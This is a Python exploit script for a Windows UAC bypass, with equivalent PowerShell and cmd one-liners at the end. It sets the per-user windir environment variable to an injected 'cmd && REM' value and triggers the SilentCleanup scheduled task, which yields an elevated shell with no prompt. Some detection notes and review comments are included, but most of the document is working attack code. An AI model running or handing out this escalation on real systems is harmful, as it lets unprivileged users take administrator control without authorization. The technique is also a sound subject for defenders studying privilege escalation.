Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel, meaning the scheduled task runs elevated as administrator without any prompt.
Its "Execute" path also contains an environment variable (%windir%\system32\cleanmgr.exe), and per-user environment variables are stored in the HKCU registry hive, which is write-accessible to the user (HKCU\Environment).
We can therefore perform an AlwaysNotify UAC bypass by changing the user's 'windir' environment variable to our own payload and triggering it through the SilentCleanup scheduled task.
'''
# Python 2 only: `_winreg` became `winreg` in Python 3 and `print` is used as a
# statement throughout this script.
from _winreg import *
# Per-user environment block. HKCU\Environment is writable by the unprivileged
# user, which is the whole premise of the bypass described in the header.
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
registrykey = OpenKey(HKCU, 'Environment', 0, KEY_ALL_ACCESS)
print "Modifying windir environment variable"
# Overrides %windir% for this user only. When the task's command line
# "%windir%\system32\cleanmgr.exe" is expanded it becomes
# "cmd && REM\system32\cleanmgr.exe": cmd.exe runs and REM turns the rest of
# the line into a comment.
# Detection note: the durable artifact is the value-set event on
# HKCU\Environment\windir (e.g. Sysmon event 13, or Security 4657 with registry
# auditing), not the key's resting state -- the value is deleted again at the
# end of the script. NOTE(review): if anything between this call and that
# DeleteValue raises, the override stays in place for the user.
SetValueEx(registrykey, 'windir', 0, REG_SZ, 'cmd && REM') # so our payload will basically be (cmd && REM\system32\cleanmgr.exe) and REM comments out the rest of the line
print "Setting payload"
from ctypes.wintypes import *
from ctypes import *
shell32 = WinDLL('shell32' , use_last_error=True)
kernel32 = WinDLL('kernel32', use_last_error=True) # NOTE(review): loaded but never referenced in this listing
# ANSI string pointer; the unsuffixed shell32.ShellExecuteEx export used below
# is presumably the ANSI variant, which is why c_char_p is used here -- confirm.
LPCTSTR = c_char_p
# Contains information used by ShellExecuteEx.
# https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
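class ShellExecuteInfo(Structure): # typedef struct _SHELLEXECUTEINFO
    """ctypes mirror of the Win32 SHELLEXECUTEINFO structure (ANSI string fields).

    Field order and widths follow the Windows definition so an instance can be
    passed by reference to shell32.ShellExecuteEx. The caller must set
    ``cbSize`` to ``sizeof(instance)`` before the call; all other fields
    default to zero/NULL.

    Layout fix: the original listing had the field list at column 0, which
    does not parse as a class body. ``lpClass`` is now typed ``LPCTSTR`` to
    match the struct definition quoted in the comments (``LPSTR`` and
    ``LPCTSTR`` are both ``c_char_p`` here, so the layout is unchanged).
    """
    _fields_ = [                                    # {
        ('cbSize', DWORD),                          # DWORD cbSize;
        ('fMask', ULONG),                           # ULONG fMask;
        ('hwnd', HWND),                             # HWND hwnd;
        ('lpVerb', LPCTSTR),                        # LPCTSTR lpVerb;
        ('lpFile', LPCTSTR),                        # LPCTSTR lpFile;
        ('lpParameters', LPCTSTR),                  # LPCTSTR lpParameters;
        ('lpDirectory', LPCTSTR),                   # LPCTSTR lpDirectory;
        ('nShow', c_int),                           # int nShow;
        ('hInstApp', HINSTANCE),                    # HINSTANCE hInstApp;
        ('lpIDList', LPVOID),                       # LPVOID lpIDList;
        ('lpClass', LPCTSTR),                       # LPCTSTR lpClass;
        ('hKeyClass', HKEY),                        # HKEY hkeyClass;
        ('dwHotKey', DWORD),                        # DWORD dwHotKey;
        ('hIcon', HANDLE),                          # union { HANDLE hIcon; HANDLE hMonitor; }
        ('hProcess', HANDLE),                       # HANDLE hProcess;
    ]                                               # }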
PShellExecuteInfo = POINTER(ShellExecuteInfo)
# Bind shell32.ShellExecuteEx with an explicit prototype: BOOL f(SHELLEXECUTEINFO*).
ShellExecuteEx = shell32.ShellExecuteEx
ShellExecuteEx.restype = BOOL
ShellExecuteEx.argtypes = [
PShellExecuteInfo
]
SW_HIDE = 0 # nShow value: launch the process without a visible window
ShellExecute = ShellExecuteInfo()
ShellExecute.cbSize = sizeof(ShellExecute) # required by the API before the call
ShellExecute.lpFile = u'schtasks.exe'
# Runs the SilentCleanup task on demand. The "\M", "\W", "\D" and "\S" escapes
# are not recognised by Python 2 and are kept as literal backslashes; newer
# Python versions warn about them, so a raw string would be the safer form.
# lpVerb is left NULL, so the default verb applies (presumably "open" -- confirm).
ShellExecute.lpParameters = u'/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I'
ShellExecute.nShow = SW_HIDE
# NOTE(review): the BOOL result is discarded and GetLastError() is never read,
# even though use_last_error=True was requested when loading shell32.
# Detection note: an on-demand schtasks.exe /Run of the SilentCleanup task from
# a user process, followed by the task host spawning something other than
# cleanmgr.exe, is the observable sequence here.
ShellExecuteEx(byref(ShellExecute))
print "Triggering SilentCleanup, should spawn a shell with administrative privileges"
# Fixed 1 s wait before the override is removed; the timing is not synchronised
# with the task in any way.
import time; time.sleep(1)
# Restores the user's environment by removing the temporary override (see the
# NOTE above: an exception before this line leaves it in place).
DeleteValue(registrykey, 'windir')
CloseKey(registrykey)
'''
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd && REM" | Out-Null
PS C:\Users\uknown> Start-Process -FilePath "schtasks.exe" -ArgumentList "/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
PS C:\Users\uknown> Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" -ErrorAction SilentlyContinue | Out-Null
'''
'''
Microsoft Windows [Version 10.0.16299.248]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\uknown>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM " && schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
'''
'''
34.
- Author: James Forshaw
- Type: Shell API
- Method: Environment variables expansion
- Target(s): \system32\svchost.exe via \system32\schtasks.exe
- Component(s): Attacker defined
- Works from: Windows 8.1 (9600)
- AlwaysNotify compatible
- Fixed in: unfixed 🙈
- How: -
'''